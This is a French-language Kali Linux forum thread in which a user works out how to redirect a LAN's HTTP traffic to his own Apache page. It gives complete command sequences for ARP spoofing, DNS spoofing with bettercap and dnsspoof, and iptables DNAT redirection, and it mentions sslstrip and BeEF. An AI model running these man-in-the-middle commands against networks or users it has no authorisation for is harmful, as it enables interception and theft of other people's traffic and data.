Le Forum francophone communautaire des utilisateurs de Kali linux

Audit et pentest => Utilisation des outils fournis par Kali linux => Discussion démarrée par: Monero le 28 février 2017 à 13:54:34

Titre: [résolu] spoof dns avec Bettercap et autre ...
Posté par: Monero le 28 février 2017 à 13:54:34
Salut tout le monde. J'arrive aujourd'hui avec une petite question. J'essaye de rediriger l'ensemble du trafic http de mon lan sur une page perso diffusée par apache2.
Pour cela j'ai essayé plusieurs techniques (Trois identifié dans ce poste pour être précis ;).
Seulement je n'arrive pas à configurer mes fichiers de manières à cibler uniquement le trafic HTTP, ou ça ne me redirige rien du tout et j'ai internet sur tout mes pages ou alors je n'ai plus internet sur l'ensemble des requêtes HTTP.

Pourtant ça me semblai simple à faire, bref ...

Voici l'ensemble des démarches que j'ai mise en place pour arriver à mes fins :

J'utilise Bettecap avec la commande suivante :

service apache2 start
bettercap -T 192.168.0.24 -G 192.168.0.254 --dns dns.conf

On trouve dans le fichier conf  :

192.168.0.22 .*
Bon ça marche mais ça redirige tout le trafic HTTP/HTTPS vers mon serveur apache. Étant donné que je n'ai pas édité de faux certificats j'ai donc une belle page d'erreur pour l'ensemble des requêtes HTTPS. Et c'est pas trop ça qui m’intéresse.

Auriez vous une idée du type de configuration de mon fichier dns pour ne cibler que du HTTP


Je me suis dit qu'une autre solution aurait été de ne pas passé par Bettercap mais de lancer un arpspoof via arpspoof ou ettercap avec en parallèle mon serveur apache activé ------> à partit de là deux solutions

1) dnsspoof avec fichier de conf comme pour bettercap (ça ne marche pas, j'ai internet, les pages défilent sur le terminal suite à la commande dnsspoof mais pas de rediréction)
# echo 1 > /proc/sys/net/ipv4/ip_forward (enable port forwarding)
service apache2 start
# arpspoof -t 192.168.0.254 192.168.0.24
# arpspoof -t 192.168.0.24 192.168.0.254
# dnsspoof -f  dns.txt
avec dans mon dns.txt :

192.168.0.22 *.*

2)Redirection du trafic avec iptable (la je perd carrément toutes connexions (délai d'attente dépassé)

echo 1 > /proc/sys/net/ipv4/ip_forward
service apache2 start
arpspoof -t 192.168.0.24 192.168.0.254
arpspoof -t 192.168.0.254 192.168.0.24
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.2.1

Bon bref trois solutions, trois problème, je bloque. C'est vrai que l'idée de faire les choses par sois même avec iptable est plutôt séduisante.
Une idée ?

Titre: Re : spoof dns avec Bettercap et autre ...
Posté par: coyotus le 28 février 2017 à 18:44:45
Tu as essayé couplé avec ssltrip ? je ne connais pas encore assez bien bettercap pour te conseiller autre chose.
Titre: Re : spoof dns avec Bettercap et autre ...
Posté par: Monero le 28 février 2017 à 19:51:49
yep je vais réessayer cette méthode dans le doute, mais il me semble que elle ne permet pas de rediriger uniquement le traffic HTTP.
Titre: Re : spoof dns avec Bettercap et autre ...
Posté par: Monero le 01 mars 2017 à 09:54:46
Bon si jamais des gens sont intéressé la meilleurs solution est la redirection avec Iptable
ça marche super bien avec les commandes suivantes :

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.2.1
service apache2 start
arpspoof -t 192.168.0.24 192.168.0.254
arpspoof -t 192.168.0.254 192.168.0.24

Puis en plus iptable c'est classe et efficace.
Bonne journée ;)
 
Titre: Re : [résolu] spoof dns avec Bettercap et autre ...
Posté par: kcdtv le 01 mars 2017 à 13:05:20
A toi aussi et merci  :)
Titre: Re : [résolu] spoof dns avec Bettercap et autre ...
Posté par: coyotus le 01 mars 2017 à 18:46:38
Merci pour le retour, du coup tu n'utilise plus bettercap ?
Titre: Re : [résolu] spoof dns avec Bettercap et autre ...
Posté par: Monero le 02 mars 2017 à 00:00:47
oubliez cette ligne elle fais tout planter :
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
j'ai modifié au dessus pour que ce soit correcte.
Le tout après c'est de bien configurer apache2 en fonction de ces besoins :-)
Pour Bettecap j'ai un peu essayé, mais pas persévéré (pour le moment), Il à une fâcheuse tendance à faire chauffer mon PC...
Il à l'aire d'offrir une quantité d'option plutôt intéressante, mais pour le HSTS c'est toujours une autre paire de manche !
En parallèle de Beef c’est vraiment intéressant pour récupérer des infos ... à approfondir ;)